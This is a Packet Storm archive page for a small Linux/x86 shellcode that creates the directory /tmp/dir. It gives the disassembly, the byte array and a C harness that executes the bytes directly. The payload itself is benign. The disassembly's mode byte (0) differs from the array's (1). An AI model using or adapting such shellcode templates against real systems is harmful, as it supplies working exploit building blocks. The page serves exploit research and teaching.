what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sys_mkdir("/tmp/dir",1) Shellcode

sys_mkdir("/tmp/dir",1) Shellcode
Posted Jun 2, 2010
Authored by gunslinger | Site gunslingerc0de.wordpress.com

38 bytes small sys_mkdir("/tmp/dir",1) Linux/x86 shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 59582ba8da796f6ba644dba1ecd84e4ffba65b4d84488cac26a44d621bdcce78

sys_mkdir("/tmp/dir",1) Shellcode

Change Mirror Download
/*
Name : 38 bytes sys_mkdir("/tmp/dir",1) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/


/*
gunslinger@localhost:~/shellcode$ objdump -d mkdir

mkdir: file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
8048060: eb 17 jmp 0x8048079
8048062: 31 c0 xor %eax,%eax
8048064: 31 db xor %ebx,%ebx
8048066: 31 d2 xor %edx,%edx
8048068: 31 c9 xor %ecx,%ecx
804806a: b0 27 mov $0x27,%al
804806c: 5b pop %ebx
804806d: b1 00 mov $0x0,%cl
804806f: cd 80 int $0x80
8048071: 31 c0 xor %eax,%eax
8048073: b0 01 mov $0x1,%al
8048075: 31 db xor %ebx,%ebx
8048077: cd 80 int $0x80
8048079: e8 e4 ff ff ff call 0x8048062
804807e: 2f das
804807f: 74 6d je 0x80480ee
8048081: 70 2f jo 0x80480b2
8048083: 64 fs
8048084: 69 .byte 0x69
8048085: 72 .byte 0x72
gunslinger@localhost:~/shellcode$
*/

#include <stdio.h>

char shellcodedir[] = "\xeb\x17"
"\x31\xc0"
"\x31\xdb"
"\x31\xd2"
"\x31\xc9"
"\xb0\x27"
"\x5b"
"\xb1\x01"
"\xcd\x80"
"\x31\xc0"
"\xb0\x01"
"\x31\xdb"
"\xcd\x80"
"\xe8\xe4\xff\xff\xff"
"\x2f"
"\x74\x6d"
"\x70\x2f"
"\x64"
"\x69"
"\x72";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcodedir;
(int)(*func)();
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close